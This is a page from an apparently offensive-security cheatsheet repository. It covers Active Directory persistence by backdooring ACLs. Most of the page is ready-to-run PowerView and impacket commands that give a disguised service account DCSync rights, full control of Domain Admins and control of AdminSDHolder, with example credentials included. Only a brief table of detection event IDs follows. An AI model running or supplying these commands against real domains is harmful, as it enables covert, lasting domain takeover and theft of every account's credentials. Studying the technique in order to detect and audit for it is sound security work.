daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-65-acl-backdooring-persistence-via-dcsync-ace.md (3445B)


      1 ---
      2 title: "Attack #65 โ€” ACL Backdooring (Persistence via DCSync ACE)"
      3 description: "An attacker with DA can add hidden ACEs to domain objects to maintain persistent access. The most common pattern: grant a seemingly innocuous user DCSyncโ€ฆ"
      4 category: active-directory
      5 subcategory: "Persistence"
      6 tags: ["active-directory", "adcs", "credential-access", "persistence"]
      7 tools: ["PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/๐ŸŸค Attack #65 โ€” ACL Backdooring (Persistence via DCSync ACE).md"
     11 ---
     12 # ๐ŸŸค Attack #65 โ€” ACL Backdooring (Persistence via DCSync ACE)
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 An attacker with DA can **add hidden ACEs** to domain objects to maintain persistent access. The most common pattern: grant a seemingly innocuous user DCSync rights on the domain root, or add GenericAll on the DA group, or backdoor AdminSDHolder (#26). Even after the DA account is revoked, the backdoor ACE allows re-escalation.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Domain Admin** | To modify ACLs on domain objects |
     27 
     28 ***
     29 
     30 ## ๐Ÿ’ป Full Commands
     31 
     32 ```powershell
     33 # โ”€โ”€ Grant DCSync to a low-priv user (persistence) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     34 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \
     35   -PrincipalIdentity svc_monitoring -Rights DCSync -Verbose
     36 # svc_monitoring now has permanent DCSync โ€” looks like a service account
     37 
     38 # โ”€โ”€ Grant GenericAll on DA group โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     39 Add-DomainObjectAcl -TargetIdentity "Domain Admins" \
     40   -PrincipalIdentity svc_monitoring -Rights All
     41 
     42 # โ”€โ”€ BackdoorAdminSDHolder (Attack #26 โ€” self-healing) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     43 Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=corp,DC=local" \
     44   -PrincipalIdentity svc_monitoring -Rights All
     45 
     46 # โ”€โ”€ Verify โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     47 Get-ObjectAcl "DC=corp,DC=local" -ResolveGUIDs | Where-Object {
     48   $_.IdentityReference -match "svc_monitoring"
     49 }
     50 ```
     51 
     52 ```bash
     53 # โ”€โ”€ Linux โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     54 dacledit.py -action write -rights DCSync \
     55   -principal svc_monitoring -target-dn "DC=corp,DC=local" \
     56   corp.local/Administrator:'Password1' -dc-ip 10.10.10.10
     57 ```
     58 
     59 ***
     60 
     61 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     62 
     63 | Event ID | Source | What to Look For |
     64 |---|---|---|
     65 | **4662** | Security Log (DC) | DACL write on domain root |
     66 | **5136** | Security Log (DC) | nTSecurityDescriptor modified |
     67 
     68 ***
     69 
     70 ## ๐Ÿ”— Attack Chain Context
     71 
     72 ```
     73 [ACL Backdooring] โ”€โ”€โ†’ Persistent Privilege Re-Escalation via Hidden ACEs
     74          โ”‚
     75          โ”œโ”€โ”€โ†’ ๐Ÿ”— DCSync ACE + AdminSDHolder = self-healing persistent access
     76          โ”œโ”€โ”€โ†’ ๐Ÿ“‹ Survives DA account revocation โ€” the backdoor ACE remains
     77          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: regular ACL audits, baseline domain root DACL
     78 ```
     79 
     80 ***
     81 
     82 > โœ… **Attack #65 โ€” ACL Backdooring complete.**